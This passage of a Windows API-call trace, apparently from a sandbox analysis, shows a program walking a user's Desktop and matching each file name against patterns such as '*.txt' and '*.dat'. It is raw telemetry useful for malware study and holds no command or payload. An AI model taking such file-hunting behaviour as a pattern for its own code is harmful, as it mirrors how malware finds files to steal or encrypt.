lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x29a0550, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac78 [0110.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac78, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.664] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*.txt") returned 0 [0110.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.665] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.665] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.665] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.665] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp" [0110.665] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.665] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.665] lstrcatW (in: lpString1="\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="\\xmxJletH7GW6y.bmp") returned="\\xmxJletH7GW6y.bmp" [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x29a0560 [0110.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x29a0560, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab58 [0110.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.665] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*.txt") returned 0 [0110.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.665] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.665] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.665] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.665] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3" [0110.665] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.665] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.665] lstrcatW (in: lpString1="\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="\\yBTl 8ysJ.mp3") returned="\\yBTl 8ysJ.mp3" [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x29a0550 [0110.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x29a0550, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.666] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*.txt") returned 0 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.666] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.666] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.666] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.666] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv" [0110.666] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.666] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.666] lstrcatW (in: lpString1="\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="\\ZyW0U6HGvR1sY4.mkv") returned="\\ZyW0U6HGvR1sY4.mkv" [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a0560 [0110.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x29a0560, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2cd8 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.666] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*.txt") returned 0 [0110.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0110.666] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.667] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.667] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.667] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods" [0110.667] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.667] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.667] lstrcatW (in: lpString1="\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="\\_aNuOe6kDQsgIz0qDq.ods") returned="\\_aNuOe6kDQsgIz0qDq.ods" [0110.667] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.667] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x29a0560 [0110.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x29a0560, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.667] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0110.667] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.667] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.667] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac00 [0110.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac00, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.667] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac00 | out: hHeap=0x29a0000) returned 1 [0110.667] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*.txt") returned 0 [0110.667] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.667] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.667] FindClose (in: hFindFile=0x743860 | out: hFindFile=0x743860) returned 1 [0110.668] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.668] GetLastError () returned 0x12 [0110.668] SetLastError (dwErrCode=0x12) [0110.668] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.668] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2858 [0110.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2858, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.668] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e40 [0110.668] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.668] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.668] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.668] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437e0 [0110.668] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.668] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.668] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.668] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.668] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.668] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.668] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.668] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.669] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.669] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.669] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.669] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.669] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.669] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.669] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.669] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.669] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.669] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.669] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.669] lstrcatW (in: lpString1="\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="\\0zAI6IIW3Y-.jpg") returned="\\0zAI6IIW3Y-.jpg" [0110.669] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.669] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.669] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.669] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.669] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.669] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaab0 [0110.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaab0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.670] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.670] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*.dat") returned 0 [0110.670] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.670] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, 